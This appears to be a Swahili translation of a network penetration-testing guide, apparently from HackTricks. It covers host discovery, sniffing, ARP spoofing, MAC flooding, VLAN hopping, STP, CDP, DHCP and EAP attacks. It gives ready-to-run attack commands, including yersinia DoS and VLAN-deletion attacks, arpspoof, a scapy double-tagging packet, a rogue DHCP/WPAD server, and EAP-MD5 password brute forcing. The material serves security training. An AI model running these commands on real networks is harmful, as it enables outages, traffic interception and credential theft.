Pentesting Mtandao

Reading time: 40 minutes

Kugundua hosts kutoka nje

Hii itakuwa sehemu fupi kuhusu jinsi ya kupata IPs zinazo jibu kutoka Intaneti.
Katika hali hii una wigo wa IPs (labda hata kadhaa za ranges) na unataka tu kupata ni IPs zipi zinazo jibu.

ICMP

Hii ni njia rahisi na ya haraka zaidi ya kugundua kama host iko hai au la.
Unaweza kujaribu kutuma baadhi ya paketi za ICMP na kutegemea majibu. Njia rahisi ni kutuma tu echo request na kutegemea majibu. Unaweza kufanya hivyo kwa kutumia ping rahisi au kwa kutumia fping kwa ranges.
Unaweza pia kutumia nmap kutuma aina nyingine za paketi za ICMP (hii itaepusha vichujio kwa ICMP echo request-response za kawaida).

ping -c 1 199.66.11.4    # 1 echo request to a host
fping -g 199.66.11.0/24  # Send echo requests to ranges
nmap -PE -PM -PP -sn -n 199.66.11.0/24 #Send echo, timestamp requests and subnet mask requests

TCP Port Discovery

Ni jambo la kawaida sana kuona kwamba aina zote za ICMP packets zimechujwa. Hivyo, unachoweza kufanya tu ili kukagua kama host iko hai ni try to find open ports. Kila host ina 65535 ports, hivyo, ikiwa una "big" scope huwezi kujaribu kama each port ya kila host iko open au la, hiyo itachukua muda mwingi.
Basi, unachohitaji ni fast port scanner (masscan) na orodha ya ports more used:

#Using masscan to scan top20ports of nmap in a /24 range (less than 5min)
masscan -p20,21-23,25,53,80,110,111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 199.66.11.0/24

Unaweza pia kufanya hatua hii kwa kutumia nmap, lakini ni polepole na nmap kwa namna fulani ina matatizo ya kutambua hosts up.

HTTP Port Discovery

Hii ni TCP port discovery tu inayofaa unapotaka kuzingatia kugundua HTTP services:

masscan -p80,443,8000-8100,8443 199.66.11.0/24

UDP Port Discovery

Unaweza pia kujaribu kuchunguza ikiwa kuna UDP port open ili kuamua kama unapaswa kulipa umakini zaidi kwa host. Kwa kuwa UDP services kawaida don't respond na any data kwa probe packet ya kawaida ya UDP isiyo na kitu, ni vigumu kusema ikiwa port inachujwa au open. Njia rahisi ya kuamua hili ni kutuma packet inayohusiana na running service, na kwa kuwa haufahamu ni service gani inaendesha, unapaswa kujaribu ile inayowezekana zaidi kulingana na port number:

nmap -sU -sV --version-intensity 0 -F -n 199.66.11.53/24
# The -sV will make nmap test each possible known UDP service packet
# The "--version-intensity 0" will make nmap only test the most probable

Mstari wa nmap uliopendekezwa hapo awali utajaribu the top 1000 UDP ports kwenye kila host ndani ya /24 range lakini hata hii peke yake itachukua >20min. Ikiwa unahitaji matokeo ya haraka zaidi unaweza kutumia udp-proto-scanner: ./udp-proto-scanner.pl 199.66.11.53/24 Hii itatuma hizi UDP probes kwenye expected port zao (kwa /24 range hii itachukua dakika 1 tu): DNSStatusRequest, DNSVersionBindReq, NBTStat, NTPRequest, RPCCheck, SNMPv3GetRequest, chargen, citrix, daytime, db2, echo, gtpv1, ike,ms-sql, ms-sql-slam, netop, ntp, rpc, snmp-public, systat, tftp, time, xdmcp.

SCTP Port Discovery

#Probably useless, but it's pretty fast, why not try it?
nmap -T4 -sY -n --open -Pn <IP/range>

Pentesting Wifi

Hapa unaweza kupata mwongozo mzuri wa Wifi attacks zote zinazojulikana wakati wa kuandika:

Pentesting Wifi

Kugundua hosts kutoka ndani

Kama uko ndani ya mtandao, moja ya mambo ya kwanza utayotaka kufanya ni gundua hosts wengine. Kulingana na kiasi cha noise unachoweza/taka kufanya, vitendo tofauti vinaweza kufanywa:

Passive

Unaweza kutumia zana hizi kugundua hosts kwa passive ndani ya mtandao uliounganishwa:

netdiscover -p
p0f -i eth0 -p -o /tmp/p0f.log
# Bettercap
net.recon on/off #Read local ARP cache periodically
net.show
set net.show.meta true #more info

Hai

Kumbuka kwamba mbinu zilizotajwa katika Discovering hosts from the outside (TCP/HTTP/UDP/SCTP Port Discovery) pia zinaweza kutumika hapa.
Lakini, kwa kuwa uko katika mtandao mmoja na hosts wengine, unaweza kufanya mambo zaidi:

#ARP discovery
nmap -sn <Network> #ARP Requests (Discover IPs)
netdiscover -r <Network> #ARP requests (Discover IPs)

#NBT discovery
nbtscan -r 192.168.0.1/24 #Search in Domain

# Bettercap
net.probe on/off #Discover hosts on current subnet by probing with ARP, mDNS, NBNS, UPNP, and/or WSD
set net.probe.mdns true/false #Enable mDNS discovery probes (default=true)
set net.probe.nbns true/false #Enable NetBIOS name service discovery probes (default=true)
set net.probe.upnp true/false #Enable UPNP discovery probes (default=true)
set net.probe.wsd true/false #Enable WSD discovery probes (default=true)
set net.probe.throttle 10 #10ms between probes sent (default=10)

#IPv6
alive6 <IFACE> # Send a pingv6 to multicast.

Active ICMP

Kumbuka kwamba mbinu zilizotajwa katika Discovering hosts from the outside (ICMP) zinaweza pia kutumika hapa.
Lakini, kwa kuwa uko kwenye mtandao uleule na hosts wengine, unaweza kufanya mambo zaidi:

• Ikiwa utapinga subnet broadcast address ping inapaswa kufika kwa kila host na wanaweza kujibu kwa wewe: ping -b 10.10.5.255
• Kupiga ping kwa network broadcast address unaweza hata kupata hosts ndani ya other subnets: ping -b 255.255.255.255
• Tumia bendera -PE, -PP, -PM za nmap kufanya host discovery kwa kutuma mtawalia ICMPv4 echo, timestamp, na subnet mask requests: nmap -PE -PM -PP -sn -vvv -n 10.12.5.0/24

Wake On Lan

Wake On Lan inatumiwa kuwasha computers kupitia network message. The magic packet inayotumika kuwasha computer ni packet ambapo MAC Dst imetolewa kisha inarudiwa 16 times ndani ya packet hiyo.
Aina hizi za packets kwa kawaida hutumwa katika ethernet 0x0842 au katika UDP packet to port 9.
Ikiwa no [MAC] imetolewa, packet itatumwa kwenye broadcast ethernet (na broadcast MAC ndilo litakalorudiwa).

# Bettercap (if no [MAC] is specificed ff:ff:ff:ff:ff:ff will be used/entire broadcast domain)
wol.eth [MAC] #Send a WOL as a raw ethernet packet of type 0x0842
wol.udp [MAC] #Send a WOL as an IPv4 broadcast packet to UDP port 9

Kuchunguza Hosts

Mara baada ya kugundua IP zote (za nje au za ndani) unazotaka kuchunguza kwa kina, vitendo tofauti vinaweza kufanywa.

TCP

• Wazi port: SYN --> SYN/ACK --> RST
• Imefungwa port: SYN --> RST/ACK
• Imechujwa port: SYN --> [HAKUNA JIBU]
• Imechujwa port: SYN --> ICMP message

# Nmap fast scan for the most 1000tcp ports used
nmap -sV -sC -O -T4 -n -Pn -oA fastscan <IP>
# Nmap fast scan for all the ports
nmap -sV -sC -O -T4 -n -Pn -p- -oA fullfastscan <IP>
# Nmap fast scan for all the ports slower to avoid failures due to -T4
nmap -sV -sC -O -p- -n -Pn -oA fullscan <IP>

#Bettercap Scan
syn.scan 192.168.1.0/24 1 10000 #Ports 1-10000

UDP

Kuna chaguzi 2 za kuchanganua UDP port:

• Tuma UDP packet na angalia response ICMP unreachable ikiwa UDP port iko closed (katika matukio kadhaa ICMP itakuwa filtered, hivyo hutapokea taarifa yoyote ikiwa port iko closed au open).
• Tuma formatted datagrams ili kuchochea response kutoka kwa service (kwa mfano, DNS, DHCP, TFTP, na zingine, kama zilivyoorodheshwa katika nmap-payloads). Ikiwa utapokea response, basi port iko open.

Nmap itachanganya chaguzi zote mbili kwa kutumia "-sV" (UDP scans ni polepole sana), lakini kumbuka kwamba UDP scans ni polepole zaidi kuliko TCP scans:

# Check if any of the most common udp services is running
udp-proto-scanner.pl <IP>
# Nmap fast check if any of the 100 most common UDP services is running
nmap -sU -sV --version-intensity 0 -n -F -T4 <IP>
# Nmap check if any of the 100 most common UDP services is running and launch defaults scripts
nmap -sU -sV -sC -n -F -T4 <IP>
# Nmap "fast" top 1000 UDP ports
nmap -sU -sV --version-intensity 0 -n -T4 <IP>
# You could use nmap to test all the UDP ports, but that will take a lot of time

SCTP Scan

SCTP (Stream Control Transmission Protocol) imeundwa kutumika pamoja na TCP (Transmission Control Protocol) na UDP (User Datagram Protocol). Kusudi lake kuu ni kuwezesha usafirishaji wa data za telefoni juu ya mitandao ya IP, likifanana na sifa nyingi za uaminifu zinazopatikana katika Signaling System 7 (SS7). SCTP ni sehemu muhimu ya familia ya itifaki ya SIGTRAN, ambayo inalenga kusafirisha ishara za SS7 juu ya mitandao ya IP.

Msaada kwa SCTP unapatikana katika mifumo mbalimbali ya uendeshaji, kama IBM AIX, Oracle Solaris, HP-UX, Linux, Cisco IOS, na VxWorks, ikionyesha kukubalika kwake kwa upana na matumizi yake katika uwanja wa telekomunikesheni na mitandao.

Aina mbili tofauti za scans za SCTP zinatolewa na nmap: -sY na -sZ

# Nmap fast SCTP scan
nmap -T4 -sY -n -oA SCTFastScan <IP>
# Nmap all SCTP scan
nmap -T4 -p- -sY -sV -sC -F -n -oA SCTAllScan <IP>

IDS and IPS evasion

IDS and IPS Evasion

More nmap options

Nmap Summary (ESP)

Kufichua Anwani za IP za Ndani

Misconfigured routers, firewalls, and network devices mara nyingine hujibu network probes kwa kutumia anwani za chanzo zisizo za umma. tcpdump inaweza kutumika kubaini packets zinazopokelewa kutoka kwa anwani za ndani wakati wa majaribio. Haswa, kwenye Kali Linux, packets zinaweza kukamatwa kwenye eth2 interface, ambayo inapatikana kutoka kwenye intaneti ya umma. Ni muhimu kutambua kwamba ikiwa usanidi wako uko nyuma ya NAT au Firewall, packets kama hizo huenda zikachujwa.

tcpdump –nt -i eth2 src net 10 or 172.16/12 or 192.168/16
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth2, link-type EN10MB (Ethernet), capture size 65535 bytes
IP 10.10.0.1 > 185.22.224.18: ICMP echo reply, id 25804, seq 1582, length 64
IP 10.10.0.2 > 185.22.224.18: ICMP echo reply, id 25804, seq 1586, length 64

Sniffing

Kupitia sniffing unaweza kupata maelezo ya IP ranges, subnet sizes, MAC addresses, na hostnames kwa kupitia frames na packets zilizokamatwa. Ikiwa mtandao umewekwa vibaya au switching fabric iko chini ya msongo, washambuliaji wanaweza kunasa taarifa nyeti kupitia passive network sniffing.

Ikiwa switched Ethernet network imewekwa ipasavyo, utaona tu broadcast frames na material iliyotumwa kwa MAC address yako.

TCPDump

sudo tcpdump -i <INTERFACE> udp port 53 #Listen to DNS request to discover what is searching the host
tcpdump -i <IFACE> icmp #Listen to icmp packets
sudo bash -c "sudo nohup tcpdump -i eth0 -G 300 -w \"/tmp/dump-%m-%d-%H-%M-%S-%s.pcap\" -W 50 'tcp and (port 80 or port 443)' &"

Pia, mtu anaweza kunasa packets kutoka kwa mashine ya mbali kupitia kikao cha SSH kwa kutumia Wireshark kama GUI kwa realtime.

ssh user@<TARGET IP> tcpdump -i ens160 -U -s0 -w - | sudo wireshark -k -i -
ssh <USERNAME>@<TARGET IP> tcpdump -i <INTERFACE> -U -s0 -w - 'port not 22' | sudo wireshark -k -i - # Exclude SSH traffic

Bettercap

net.sniff on
net.sniff stats
set net.sniff.output sniffed.pcap #Write captured packets to file
set net.sniff.local  #If true it will consider packets from/to this computer, otherwise it will skip them (default=false)
set net.sniff.filter #BPF filter for the sniffer (default=not arp)
set net.sniff.regexp #If set only packets matching this regex will be considered

Wireshark

Bila shaka.

Capturing credentials

Unaweza kutumia tools kama https://github.com/lgandx/PCredz kuchambua credentials kutoka pcap au live interface.

LAN attacks

ARP spoofing

ARP Spoofing inajumuisha kutuma gratuitous ARPResponses ili kuonyesha kwamba IP ya mashine ina MAC ya kifaa chetu. Kisha, victim atabadilisha ARP table na atawasiliana na mashine yetu kila mara itakapotaka kuwasiliana na IP spoofed.

Bettercap

arp.spoof on
set arp.spoof.targets <IP> #Specific targets to ARP spoof (default=<entire subnet>)
set arp.spoof.whitelist #Specific targets to skip while spoofing
set arp.spoof.fullduplex true #If true, both the targets and the gateway will be attacked, otherwise only the target (default=false)
set arp.spoof.internal true #If true, local connections among computers of the network will be spoofed, otherwise only connections going to and coming from the Internet (default=false)

Arpspoof

echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -t 192.168.1.1 192.168.1.2
arpspoof -t 192.168.1.2 192.168.1.1

MAC Flooding - CAM overflow

Fanya CAM table ya switch kuzidiwa kwa kutuma packets nyingi zenye source mac address tofauti. Wakati CAM table imejaa, switch huanza kujiendesha kama hub (broadcasting all the traffic).

macof -i <interface>

Katika swichi za kisasa tatizo hili limerekebishwa.

802.1Q VLAN / DTP Mashambulio

Dynamic Trunking

The Dynamic Trunking Protocol (DTP) imeundwa kama protocol ya link layer ili kuwezesha mfumo wa otomatiki wa trunking, kuruhusu swichi kuchagua bandari kwa njia ya trunk (Trunk) au isiyo ya trunk. Utumiaji wa DTP mara nyingi unaonekana kuwa dalili ya muundo wa mtandao usio bora, ikiweka msisitizo wa umuhimu wa ku-configure trunks kwa mkono tu pale inapohitajika na kuhakikisha nyaraka sahihi.

Kwa default, ports za swichi zimewekwa kufanya kazi katika Dynamic Auto mode, ikimaanisha ziko tayari kuanzisha trunking endapo zitachochewa na swichi jirani. Tatizo la usalama linapotokea ni pale pentester au mshambuliaji anapojiunga na swichi na kutuma frame ya DTP Desirable, akilazimisha port kuingia katika trunk mode. Hatua hii inamwezesha mshambuliaji kuhesabu VLAN kupitia uchambuzi wa frame za STP na kuzunguka segmentation ya VLAN kwa kuanzisha virtual interfaces.

Uwepo wa DTP katika swichi nyingi kwa default unaweza kutumiwa na adui kuiga tabia ya swichi, na hivyo kupata ufikiaji wa trafiki kwenye VLAN zote. The script dtpscan.sh hutumika kusmonitor interface, ikionyesha kama swichi iko katika Default, Trunk, Dynamic, Auto, au Access mode — hii ya mwisho ndiyo configuration pekee isiyo hatarini kwa VLAN hopping attacks. Zana hii inatathmini hali ya udhaifu wa swichi.

Iwapo udhaifu wa mtandao utagundulika, zana Yersinia inaweza kutumika ku-"enable trunking" kupitia protocol ya DTP, kuruhusu uchunguzi wa packets kutoka VLAN zote.

apt-get install yersinia #Installation
sudo apt install kali-linux-large #Another way to install it in Kali
yersinia -I #Interactive mode
#In interactive mode you will need to select a interface first
#Then, you can select the protocol to attack using letter "g"
#Finally, you can select the attack using letter "x"

yersinia -G #For graphic mode

Ili kuorodhesha VLANs pia inawezekana kuzalisha fremu ya DTP Desirable kwa kutumia script DTPHijacking.py. Usisimamisha script kwa hali yoyote ile. Inaingiza DTP Desirable kila sekunde tatu. Trunk channels zinazoundwa kwa njia ya dynamic kwenye switch huishi kwa dakika tano tu. Baada ya dakika tano, trunk inakatika.

sudo python3 DTPHijacking.py --interface eth0

Ningependa kuonyesha kwamba Access/Desirable (0x03) inaonyesha kwamba fremu ya DTP ni ya aina ya Desirable, ambayo inaelekeza port kubadili hadi Trunk mode. Na 802.1Q/802.1Q (0xa5 inaonyesha aina ya encapsulation ya 802.1Q.

Kwa kuchambua fremu za STP, tunajifunza kuhusu uwepo wa VLAN 30 na VLAN 60.

Kushambulia VLAN maalum

Mara tu unapojua VLAN IDs na thamani za IP, unaweza kusanidi interface ya virtual kushambulia VLAN maalum.
Ikiwa DHCP haipatikani, tumia ifconfig kuweka anwani ya IP ya statiki.

root@kali:~# modprobe 8021q
root@kali:~# vconfig add eth1 250
Added VLAN with VID == 250 to IF -:eth1:-
root@kali:~# dhclient eth1.250
Reloading /etc/samba/smb.conf: smbd only.
root@kali:~# ifconfig eth1.250
eth1.250  Link encap:Ethernet  HWaddr 00:0e:c6:f0:29:65
inet addr:10.121.5.86  Bcast:10.121.5.255  Mask:255.255.255.0
inet6 addr: fe80::20e:c6ff:fef0:2965/64 Scope:Link
UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
RX packets:19 errors:0 dropped:0 overruns:0 frame:0
TX packets:13 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:2206 (2.1 KiB)  TX bytes:1654 (1.6 KiB)

root@kali:~# arp-scan -I eth1.250 10.121.5.0/24

# Another configuration example
modprobe 8021q
vconfig add eth1 20
ifconfig eth1.20 192.168.1.2 netmask 255.255.255.0 up

# Another configuration example
sudo vconfig add eth0 30
sudo ip link set eth0.30 up
sudo dhclient -v eth0.30

Automatic VLAN Hopper

Shambulio lililojadiliwa la Dynamic Trunking and creating virtual interfaces an discovering hosts inside kwenye VLAN nyingine limefanywa kiotomatiki na tool: https://github.com/nccgroup/vlan-hopping---frogger

Double Tagging

If an attacker knows the value of the MAC, IP and VLAN ID of the victim host, he could try to double tag a frame with its designated VLAN and the VLAN of the victim and send a packet. As the victim won't be able to connect back with the attacker, so the best option for the attacker is communicate via UDP to protocols that can perform some interesting actions (like SNMP).

Another option for the attacker is to launch a TCP port scan spoofing an IP controlled by the attacker and accessible by the victim (probably through internet). Then, the attacker could sniff in the second host owned by him if it receives some packets from the victim.

Ili kutekeleza shambulio hili unaweza kutumia scapy: pip install scapy

from scapy.all import *
# Double tagging with ICMP packet (the response from the victim isn't double tagged so it will never reach the attacker)
packet = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=20)/IP(dst='192.168.1.10')/ICMP()
sendp(packet)

Lateral VLAN Segmentation Bypass

Ikiwa una ufikiaji wa switch ambayo umeunganishwa nayo moja kwa moja, una uwezo wa bypass VLAN segmentation ndani ya mtandao. Badilisha tu port kuwa trunk mode (pia inajulikana kama trunk), unda virtual interfaces zenye IDs za VLANs lengwa, na sanidi IP address. Unaweza kujaribu kuomba anwani kwa njia ya dinamik (DHCP) au kuisanidi kwa static. Inategemea kesi.

Lateral VLAN Segmentation Bypass

Layer 3 Private VLAN Bypass

Katika mazingira fulani, kama guest wireless networks, port isolation (pia inajulikana kama private VLAN) mipangilio hufanywa ili kuzuia clients waliounganishwa na wireless access point kuwasiliana moja kwa moja. Hata hivyo, mbinu imegunduliwa inayoweza kuzurura hatua hizi za isolation. Mbinu hii inatumia ukosefu wa network ACLs au usanidi mbaya wa ACLs, kuruhusu IP packets kupitishwa kupitia router kufikia client mwingine kwenye mtandao huo.

Shambulio linatekelezwa kwa kuunda paketi inayobeba IP address ya mteja wa lengo lakini yenye MAC address ya router. Hii husababisha router kwa makosa kusafirisha paketi kwa mteja wa lengo. Njia hii inafanana na ile inayotumika katika Double Tagging Attacks, ambapo uwezo wa kudhibiti host inayoweza kufikiwa na mwathiriwa hutumika kuchochea kasoro ya usalama.

Key Steps of the Attack:

1. Crafting a Packet: Paketi inatengenezwa mahsusi ili kujumuisha IP address ya mteja wa lengo lakini yenye MAC address ya router.
2. Exploiting Router Behavior: Paketi iliyotengenezwa inatumwa kwa router, ambayo kutokana na usanidi, inapisua/irekebishe paketi kwa mteja wa lengo, ikiepuka isolation inayotolewa na mipangilio ya private VLAN.

VTP Attacks

VTP (VLAN Trunking Protocol) huweka usimamizi wa VLAN kwa sehemu moja. Inatumia nambari za revision kudumisha uadilifu wa database ya VLAN; mabadiliko yoyote huongeza nambari hii. Switches zinachukua configurations zenye nambari za revision zilizo juu, zikisasisha databases zao za VLAN.

VTP Domain Roles

• VTP Server: Inasimamia VLANs—huunda, hufuta, hubadilisha. Inatangaza VTP announcements kwa wanachama wa domain.
• VTP Client: Inapokea VTP announcements ili kusawazisha database yake ya VLAN. Nafasi hii imezuiliwa kufanya mabadiliko ya local VLAN configuration.
• VTP Transparent: Haihusiki katika updates za VTP lakini inapita VTP announcements mbele. Haiaathiriwi na VTP attacks, inahifadhi nambari ya revision ya sifuri.

VTP Advertisement Types

• Summary Advertisement: Inatangazwa na VTP server kila sekunde 300, ikibeba taarifa muhimu za domain.
• Subset Advertisement: Inatumwa baada ya mabadiliko ya configuration ya VLAN.
• Advertisement Request: Inatolewa na VTP client kuomba Summary Advertisement, kawaida kama jibu la kugundua nambari ya revision ya configuration iliyoongezeka.

Uranabau wa VTP unaweza kutumika pekee kupitia trunk ports kwani VTP announcements zinazunguka tu kupitia hizo. Baada ya shambulio la DTP, hali zinaweza kugeukia VTP. Zana kama Yersinia zinaweza kusaidia VTP attacks, zikiwa na lengo la kufuta database ya VLAN, hivyo kusababisha mtandao kuvurugika.

Kumbuka: Majadiliano haya yanahusu VTP version 1 (VTPv1).

yersinia -G # Launch Yersinia in graphical mode

Katika hali ya grafiki ya Yersinia, chagua chaguo la deleting all VTP vlans ili kufuta VLAN database.

Shambulio za STP

Kama huwezi kunasa BPDU frames kwenye interfaces zako, kuna uwezekano mdogo kwamba utafaulu katika shambulio la STP.

STP BPDU DoS

Kutuma BPDUs nyingi TCP (Topology Change Notification) au Conf (the BPDUs that are sent when the topology is created) husababisha switches kuzidiwa kazi na kuacha kufanya kazi ipasavyo.

yersinia stp -attack 2
yersinia stp -attack 3
#Use -M to disable MAC spoofing

STP TCP Attack

Wakati TCP inapotumwa, CAM table ya switches itaondolewa baada ya 15s. Kisha, ikiwa utaendelea kutuma aina hii ya packets, CAM table itaanzishwa upya mara kwa mara (au kila 15segs) na inapoinzishwa upya, switch itatenda kama hub

yersinia stp -attack 1 #Will send 1 TCP packet and the switch should restore the CAM in 15 seconds
yersinia stp -attack 0 #Will send 1 CONF packet, nothing else will happen

STP Root Attack

Mshambuliaji anajifanya kuwa switch ili kuwa STP root wa mtandao. Kisha, data zaidi itapitia kupitia kwake. Hii inakuwa muhimu unapounganishwa na switches mbili tofauti.
Hii hufanywa kwa kutuma BPDUs CONF packets zikisema kwamba thamani ya priority ni ndogo kuliko priority halisi ya root switch.

yersinia stp -attack 4 #Behaves like the root switch
yersinia stp -attack 5 #This will make the device behaves as a switch but will not be root

Ikiwa mshambuliaji ameunganishwa na 2 swichi anaweza kuwa mzizi wa mti mpya na trafiki yote kati ya swichi hizo itapitia kupitia kwake (a MITM attack will be performed).

yersinia stp -attack 6 #This will cause a DoS as the layer 2 packets wont be forwarded. You can use Ettercap to forward those packets "Sniff" --> "Bridged sniffing"
ettercap -T -i eth1 -B eth2 -q #Set a bridge between 2 interfaces to forwardpackages

Shambulio za CDP

CISCO Discovery Protocol (CDP) ni muhimu kwa mawasiliano kati ya vifaa vya CISCO, ikiwawezesha kutambua kila mmoja na kushiriki maelezo ya usanidi.

Kukusanya Data kwa Njia ya Kimya

CDP imewekwa kutangaza taarifa kupitia bandari zote, jambo ambalo linaweza kusababisha hatari ya usalama. Mshambuliaji, anapounganisha kwenye bandari ya switch, anaweza kutumia network sniffers kama Wireshark, tcpdump, au Yersinia. Hatua hii inaweza kufichua taarifa nyeti kuhusu kifaa cha mtandao, ikiwa ni pamoja na mfano wake na toleo la Cisco IOS kinachotumika. Mshambuliaji anaweza kisha kulenga udhaifu maalum katika toleo la Cisco IOS lililotambuliwa.

Kusababisha Kujaa kwa Jedwali la CDP

Njia kali zaidi inahusisha kuanzisha Denial of Service (DoS) attack kwa kuzidisha kumbukumbu ya switch, kwa kujifanya kuwa vifaa halali vya CISCO. Hapo chini ni mlolongo wa amri za kuanzisha shambulio kama hilo ukitumia Yersinia, zana ya mtandao iliyoundwa kwa ajili ya kujaribu:

sudo yersinia cdp -attack 1 # Initiates a DoS attack by simulating fake CISCO devices
# Alternatively, for a GUI approach:
sudo yersinia -G

Wakati wa shambulio hili, CPU ya switch na jedwali la majirani la CDP vinabebwa mzigo mkubwa, na kusababisha kile kinachoitwa mara nyingi “paralisi ya mtandao” kutokana na matumizi ya rasilimali kupita kiasi.

CDP Impersonation Attack

sudo yersinia cdp -attack 2 #Simulate a new CISCO device
sudo yersinia cdp -attack 0 #Send a CDP packet

Unaweza pia kutumia scapy. Hakikisha umeisakinisha na kifurushi scapy/contrib.

Mashambulizi ya VoIP na Zana ya VoIP Hopper

Simu za VoIP, ambazo zinaongezeka kuingizwa na vifaa vya IoT, zina kazi kama kufungua milango au kudhibiti thermostats kupitia nambari za simu maalum. Hata hivyo, muunganiko huu unaweza kuleta hatari za usalama.

Zana voiphopper imeundwa kuiga simu ya VoIP katika mazingira mbalimbali (Cisco, Avaya, Nortel, Alcatel-Lucent). Inagundua VLAN ID ya mtandao wa sauti kwa kutumia protokoli kama CDP, DHCP, LLDP-MED, na 802.1Q ARP.

VoIP Hopper inatoa modi tatu za Cisco Discovery Protocol (CDP):

1. Sniff Mode (-c 0): Inachambua pakiti za mtandao ili kubaini VLAN ID.
2. Spoof Mode (-c 1): Inazalisha pakiti za kibinafsi zinazoiga zile za kifaa halisi cha VoIP.
3. Spoof with Pre-made Packet Mode (-c 2): Inatuma pakiti zinazofanana kabisa na zile za mfano maalum wa simu ya Cisco IP.

Modi inayopendekezwa kwa kasi ni ya tatu. Inahitaji kubainisha:

• Kiolesura cha mtandao cha mshambuliaji (-i parameter).
• Jina la kifaa cha VoIP kinachoigwa (-E parameter), kikiendana na muundo wa majina wa Cisco (mfano, SEP ikifuatiwa na anwani ya MAC).

Katika mazingira ya kampuni, ili kuiga kifaa kilicho tayari, mtu anaweza:

• Kukagua lebo ya MAC kwenye simu.
• Kupitia mipangilio ya onyesho ya simu ili kuona taarifa za modeli.
• Kuunganisha kifaa cha VoIP kwenye laptop na kutazama maombi ya CDP kwa kutumia Wireshark.

Mfano wa amri ya kuendesha zana katika modi ya tatu utakuwa:

voiphopper -i eth1 -E 'SEP001EEEEEEEEE ' -c 2

Mashambulio ya DHCP

Enumeration

nmap --script broadcast-dhcp-discover
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-16 05:30 EDT
WARNING: No targets were specified, so 0 hosts scanned.
Pre-scan script results:
| broadcast-dhcp-discover:
|   Response 1 of 1:
|     IP Offered: 192.168.1.250
|     DHCP Message Type: DHCPOFFER
|     Server Identifier: 192.168.1.1
|     IP Address Lease Time: 1m00s
|     Subnet Mask: 255.255.255.0
|     Router: 192.168.1.1
|     Domain Name Server: 192.168.1.1
|_    Domain Name: mynet
Nmap done: 0 IP addresses (0 hosts up) scanned in 5.27 seconds

DoS

Aina mbili za DoS zinaweza kutekelezwa dhidi ya DHCP servers. Ya kwanza inahusisha kuiga hosts bandia za kutosha ili kutumia anwani zote za IP zinazowezekana.
Shambulio hili litafanya kazi tu ikiwa unaweza kuona majibu ya DHCP server na kukamilisha protocol (Discover (Comp) --> Offer (server) --> Request (Comp) --> ACK (server)). Kwa mfano, hili haiwezekani katika Wifi networks.

Njia nyingine ya kufanya DHCP DoS ni kutuma a DHCP-RELEASE packet kwa kutumia kila IP inayowezekana kama source. Kisha, server itaona kwamba kila mtu amemaliza kutumia IP.

yersinia dhcp -attack 1
yersinia dhcp -attack 3 #More parameters are needed

Njia ya kiotomatiki zaidi ya kufanya hili ni kutumia zana DHCPing

Unaweza kutumia DoS attacks zilizotajwa kulazimisha clients kupata leases mpya ndani ya environment, na kuzichosha legitimate servers hadi zisijibu. Hivyo wakati legitimate zinajaribu kuungana tena, utaweza kuwasilisha malicious values zilizotajwa katika shambulio lijalo.

Weka malicious values

A rogue DHCP server can be set up using the DHCP script located at /usr/share/responder/DHCP.py. Hii ni ya manufaa kwa network attacks, kama kukamata HTTP traffic na credentials, kwa kupeleka traffic kwenye malicious server. Hata hivyo, kuweka rogue gateway si yenye ufanisi sana kwa sababu inaruhusu tu kukamata outbound traffic kutoka kwa client, ukikosa responses kutoka kwa real gateway. Badala yake, inapendekezwa kuanzisha rogue DNS au WPAD server kwa shambulio lenye ufanisi zaidi.

Below are the command options for configuring the rogue DHCP server:

• Our IP Address (Gateway Advertisement): Tumia -i 10.0.0.100 kutangaza IP ya mashine yako kama gateway.
• Local DNS Domain Name: Hiari, tumia -d example.org kuweka local DNS domain name.
• Original Router/Gateway IP: Tumia -r 10.0.0.1 kubainisha IP ya router/gateway halali.
• Primary DNS Server IP: Tumia -p 10.0.0.100 kuweka IP ya rogue DNS server unayodhibiti.
• Secondary DNS Server IP: Hiari, tumia -s 10.0.0.1 kuweka secondary DNS server IP.
• Netmask of Local Network: Tumia -n 255.255.255.0 kufafanua netmask ya network ya ndani.
• Interface for DHCP Traffic: Tumia -I eth1 kusikiliza DHCP traffic kwenye interface maalum ya network.
• WPAD Configuration Address: Tumia -w “http://10.0.0.100/wpad.dat” kuweka address ya WPAD configuration, kusaidia interception ya web traffic.
• Spoof Default Gateway IP: Jumuisha -S kuchapisha (spoof) default gateway IP.
• Respond to All DHCP Requests: Jumuisha -R ili server ijibu maombi yote ya DHCP, lakini kuwa mwangalifu kwa sababu hili ni noisy na linaweza kugundulika.

By correctly using these options, a rogue DHCP server can be established to intercept network traffic effectively.

# Example to start a rogue DHCP server with specified options
!python /usr/share/responder/DHCP.py -i 10.0.0.100 -d example.org -r 10.0.0.1 -p 10.0.0.100 -s 10.0.0.1 -n 255.255.255.0 -I eth1 -w "http://10.0.0.100/wpad.dat" -S -R

EAP Attacks

Hapa kuna baadhi ya mbinu za shambulizi zinazoweza kutumika dhidi ya utekelezaji wa 802.1X:

• Kukandamiza manenosiri kwa brute-force kwa njia ya EAP
• Kushambulia RADIUS server kwa maudhui ya EAP yaliyoharibika **(exploits)
• Kukamata ujumbe wa EAP na offline password cracking (EAP-MD5 na PEAP)
• Kulazimisha authentication ya EAP-MD5 ili kupitisha uthibitishaji wa cheti la TLS
• Kuingiza trafiki ya mtandao yenye madhara wakati wa authentication kwa kutumia hub au kifaa kinachofanana

Ikiwa attacker yuko kati ya victim na authentication server, anaweza kujaribu kudhoofisha (ikiwa ni lazima) authentication protocol hadi EAP-MD5 na kukamata jaribio la authentication. Kisha, anaweza kufanya brute-force kwa kutumia:

eapmd5pass –r pcap.dump –w /usr/share/wordlist/sqlmap.txt

Mashambulio ya FHRP (GLBP & HSRP)

FHRP (First Hop Redundancy Protocol) ni daraja ya itifaki za mtandao zilizoundwa ili kuunda mfumo wa routing wa ziada unaofanya kazi mara moja. Kwa FHRP, routers za kimwili zinaweza kuunganishwa kuwa kifaa kimoja kiakili, ambacho huongeza uvumilivu wa makosa na husaidia kugawanya mzigo.

Cisco Systems engineers have developed two FHRP protocols, GLBP and HSRP.

GLBP & HSRP Attacks

RIP

